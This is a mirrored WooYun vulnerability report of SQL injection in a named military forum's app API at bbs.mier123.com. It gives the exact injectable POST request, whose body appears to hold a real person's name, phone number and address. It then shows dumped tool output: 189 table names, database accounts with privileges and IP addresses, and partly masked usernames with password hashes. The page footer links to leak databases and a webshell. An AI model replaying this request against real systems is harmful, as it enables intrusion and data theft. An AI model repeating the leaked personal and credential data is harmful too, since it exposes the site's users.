米尔网某分站SQL高危注射(N多表)
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0122365
漏洞标题:米尔网某分站SQL高危注射(N多表)
相关厂商:米尔网
漏洞作者:DloveJ
提交时间:2015-06-24 15:43
公开时间:2015-08-08 15:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
漏洞详情
披露状态:
2015-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
米尔军事app某处注射。。俩个是一个厂商。。
app登陆积分兑换处
确定的同时抓包
|
1 2 3 4 5 6 7 |
POST /api/2.0.3/app_integral_exchange.php?plat=android&proct=mierapp&apiCode=1 HTTP/1.1<br> Content-Length: 235<br> Content-Type: application/x-www-form-urlencoded<br> Host: bbs.mier123.com<br> Connection: Keep-Alive<br> User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1<br> Accept-Encoding: gzipuid=495505&id=81&count=1&name=%E5%88%98%E4%B8%9C&phone=15104869199&address=%E5%86%85%E8%92%99%E5%8F%A4%E5%8C%85%E5%A4%B4%E5%B8%82%E6%98%86%E9%83%BD%E4%BB%91%E5%8C%BA%E5%86%85%E8%92%99%E5%8F%A4%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&cat=0 |
id可注入
多库
我们跑下15年的库
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 |
Database: mier_2015_data<br> [189 tables]<br> +--------------------------------+<br> | `[Table]access` |<br> | `[Table]activities` |<br> | `[Table]activityapplies` |<br> | `[Table]addons` |<br> | `[Table]adminactions` |<br> | `[Table]admincustom` |<br> | `[Table]admingroups` |<br> | `[Table]adminnotes` |<br> | `[Table]adminsessions` |<br> | `[Table]advertisements` |<br> | `[Table]announcements` |<br> | `[Table]app_action_log` |<br> | `[Table]app_forums` |<br> | `[Table]app_login_log` |<br> | `[Table]app_member` |<br> | `[Table]app_post` |<br> | `[Table]app_share` |<br> | `[Table]armygroup` |<br> | `[Table]armygroupadmin` |<br> | `[Table]armygroupdonation` |<br> | `[Table]armygroupnotice` |<br> | `[Table]ask_category` |<br> | `[Table]ask_comment` |<br> | `[Table]ask_user_score` |<br> | `[Table]ask_user_status` |<br> | `[Table]ask` |<br> | `[Table]attachmentfields` |<br> | `[Table]attachments` |<br> | `[Table]attachpaymentlog` |<br> | `[Table]attachtypes` |<br> | `[Table]banned` |<br> | `[Table]bbcodes` |<br> | `[Table]caches` |<br> | `[Table]connect_memberbindlog` |<br> | `[Table]credit_logs` |<br> | `[Table]creditslog` |<br> | `[Table]crons` |<br> | `[Table]debateposts` |<br> | `[Table]debates` |<br> | `[Table]failedlogins` |<br> | `[Table]fam` |<br> | `[Table]family_domain` |<br> | `[Table]family_record` |<br> | `[Table]family_want` |<br> | `[Table]faqs` |<br> | `[Table]favoriteforums` |<br> | `[Table]favorites` |<br> | `[Table]favoritethreads` |<br> | `[Table]feeds` |<br> | `[Table]forum_post_tableid` |<br> | `[Table]forumfields` |<br> | `[Table]forumlinks` |<br> | `[Table]forumrecommend` |<br> | `[Table]forums` |<br> | `[Table]fruit_order` |<br> | `[Table]goods_exchange` |<br> | `[Table]goods` |<br> | `[Table]grab_signin` |<br> | `[Table]imagetypes` |<br> | `[Table]invites` |<br> | `[Table]itempool` |<br> | `[Table]laud_stamp` |<br> | `[Table]magiclog` |<br> | `[Table]magicmarket` |<br> | `[Table]magics` |<br> | `[Table]medallog` |<br> | `[Table]medals` |<br> | `[Table]member_connect` |<br> | `[Table]memberfields` |<br> | `[Table]membermagics` |<br> | `[Table]memberrecommend` |<br> | `[Table]members1` |<br> | `[Table]members` |<br> | `[Table]memberspaces` |<br> | `[Table]moderators` |<br> | `[Table]modworks` |<br> | `[Table]monument` |<br> | `[Table]myapp` |<br> | `[Table]myinvite` |<br> | `[Table]mynotice` |<br> | `[Table]myposts` |<br> | `[Table]mytasks` |<br> | `[Table]mythreads` |<br> | `[Table]navs` |<br> | `[Table]onlinelist` |<br> | `[Table]onlinetime` |<br> | `[Table]orders` |<br> | `[Table]paymentlog` |<br> | `[Table]pk_reply` |<br> | `[Table]pk` |<br> | `[Table]plugin_promotion` |<br> | `[Table]pluginhooks` |<br> | `[Table]plugins` |<br> | `[Table]pluginvars` |<br> | `[Table]polloptions` |<br> | `[Table]polls` |<br> | `[Table]postlogs` |<br> | `[Table]postposition` |<br> | `[Table]posts` |<br> | `[Table]profilefields` |<br> | `[Table]projects` |<br> | `[Table]promotions` |<br> | `[Table]prompt` |<br> | `[Table]promptmsgs` |<br> | `[Table]prompttype` |<br> | `[Table]purifyhylanda` |<br> | `[Table]quick_login` |<br> | `[Table]quiz_answer` |<br> | `[Table]quiz_cat` |<br> | `[Table]quiz_comment` |<br> | `[Table]quiz_user_log` |<br> | `[Table]quiz` |<br> | `[Table]ranks` |<br> | `[Table]ratelog` |<br> | `[Table]regips` |<br> | `[Table]relatedthreads` |<br> | `[Table]reportlog` |<br> | `[Table]request` |<br> | `[Table]rewardlog` |<br> | `[Table]rsscaches` |<br> | `[Table]searchindex` |<br> | `[Table]sessions` |<br> | `[Table]settings` |<br> | `[Table]sign_in` |<br> | `[Table]smilies` |<br> | `[Table]spacecaches` |<br> | `[Table]stats` |<br> | `[Table]statvars` |<br> | `[Table]styles` |<br> | `[Table]stylevars` |<br> | `[Table]tags` |<br> | `[Table]tasks` |<br> | `[Table]taskvars` |<br> | `[Table]templates` |<br> | `[Table]threadlogs` |<br> | `[Table]threads` |<br> | `[Table]threadsmod` |<br> | `[Table]threadtags` |<br> | `[Table]threadtypes` |<br> | `[Table]tradecomments` |<br> | `[Table]tradelog` |<br> | `[Table]tradeoptionvars` |<br> | `[Table]trades` |<br> | `[Table]typemodels` |<br> | `[Table]typeoptions` |<br> | `[Table]typeoptionvars` |<br> | `[Table]typevars` |<br> | `[Table]uc_admins` |<br> | `[Table]uc_applications` |<br> | `[Table]uc_badwords` |<br> | `[Table]uc_domains` |<br> | `[Table]uc_failedlogins` |<br> | `[Table]uc_feeds` |<br> | `[Table]uc_friends` |<br> | `[Table]uc_mailqueue` |<br> | `[Table]uc_memberfields` |<br> | `[Table]uc_members` |<br> | `[Table]uc_mergemembers` |<br> | `[Table]uc_newpm` |<br> | `[Table]uc_notelist` |<br> | `[Table]uc_pms` |<br> | `[Table]uc_protectedmembers` |<br> | `[Table]uc_settings` |<br> | `[Table]uc_sqlcache` |<br> | `[Table]uc_tags` |<br> | `[Table]uc_vars` |<br> | `[Table]uin_black` |<br> | `[Table]userapp` |<br> | `[Table]usergroups` |<br> | `[Table]validating` |<br> | `[Table]verify_code` |<br> | `[Table]war_log` |<br> | `[Table]war_threads` |<br> | `[Table]war_user_arms` |<br> | `[Table]war_user_hoon` |<br> | `[Table]war_user_status` |<br> | `[Table]war_user` |<br> | `[Table]warnings` |<br> | `[Table]words` |<br> | `[Table]xreports` |<br> | `[Table]xwb_bind_info` |<br> | `[Table]xwb_bind_thread` |<br> | `[Table]xwb_session` |<br> | m_sign_in |<br> | pre_common_member_login |<br> | pw_log_forums |<br> | pw_log_members |<br> | pw_log_posts |<br> | pw_log_threads |<br> +--------------------------------+ |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 |
database management system users privileges<br> [*] 'bbs'@'10.3.3.%' [16]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: SELECT<br> privilege: SHOW VIEW<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'monitor'@'10.3.3.103' (administrator)<br> privilege: PROCESS<br> privilege: SELECT<br> privilege: SUPER<br> [*] 'monitor'@'122.225.105.180' (administra<br> privilege: PROCESS<br> privilege: SELECT<br> privilege: SUPER<br> [*] 'proxy1'@'10.3.3.%' (administrator) [28<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'rep'@'10.3.3.%' [1]:<br> privilege: REPLICATION SLAVE<br> [*] 'root'@'10.3.3.%' (administrator) [28]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'root'@'10.3.3.103' (administrator) [28<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'root'@'127.0.0.1' (administrator) [28]<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'root'@'::1' (administrator) [28]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'root'@'localhost' (administrator) [28]<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'test1'@'10.3.3.%' (administrator) [28]<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] 'test2'@'61.148.221.118' (administrator<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE |
漏洞证明:
iduserid pwd1 ji*ubu 4100da4***73e8cab44 a*p 18c22a3****6f57477 hu*ngcheng 612**08e4f02057978 ya**ai 0fd7be5**ff9da2a4f9 xu*un 09c8864**f328e09bc10 li*in dd90a9e**b2c011edb11 wa*hun 6a60cc**11978bae948281 jun*jia f6852cc**2f70c789c1uid username password1 sdmf**kasd 56137***51fd76c60fbed3a2 米尔007 f1847424********04f3636d4c5fc9b4 米尔 a2fcf4e******28ec8d0bcb19ad0e25 \xc7Řłż 46d6ac1a******93d562cfd10aff46 国风 7fa44e2a*****2fb30a466e0517 米尔最高统帅部 be914c******5ee6c3c0d8b7557
修复方案:
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
评价
-
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)
给高rank,拜托了。。
原文连接:米尔网某分站SQL高危注射(N多表)
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 社工库源码大全(持续更新)
- 谷歌识图,以图搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 404.php webshell
- 怎么用图片搜索番号?
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 9部有史以来最好的黑客电影
扫码分享
验证:
体验盒子扫码分享
打赏零钱
